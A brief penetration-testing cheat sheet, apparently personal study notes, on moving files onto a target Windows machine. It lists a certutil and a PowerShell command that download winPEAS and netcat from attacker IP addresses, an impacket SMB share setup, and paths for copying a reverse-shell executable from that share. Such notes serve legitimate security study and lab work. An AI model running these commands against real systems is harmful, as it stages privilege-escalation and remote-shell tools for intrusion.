Transferring Files

Simple Python Server

CertUtil

certutil -urlcache -split -f "http://192.168.254.130:8080/winPEASx64.exe" winpeas.exe

Powershell

powershell.exe -c "iwr http://192.168.118.14/nc.exe -OutFile C:\temp\nc.exe"  

SMBserver.py

sudo smbserver.py -smb2support Share $PWD # Share is the share's name

Usage : 
//192.168.49.65/Share/revshell.exe
cp //192.168.49.65/Share/revshell.exe .

Last updated

Was this helpful?